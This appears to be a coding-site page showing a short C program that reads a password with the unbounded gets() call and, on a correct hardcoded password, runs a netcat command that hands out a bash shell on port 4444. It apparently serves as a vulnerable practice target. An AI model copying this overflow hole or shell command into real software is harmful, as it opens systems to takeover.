Code Every Language Here and Now!
Code Every Language Here and Now!
#include <stdio.h> #include <string.h> void shell() { system("nc 0.0.0.0 4444 -e /bin/bash"); } void buffer() { char buff[1024]; printf("Password: "); gets(buff); if(strcmp(buff, "Z9znIhlJ0oY")) printf("\n!! ERROR: Wrong Password !!\n"); else { shell(); printf("\nCorrect Password :-)\n"); } } int main(void) { buffer(); return 0; }
learn coding by
play game and learn code by
improve your coding skills by
choose perfect colors by
join our team
qodedoq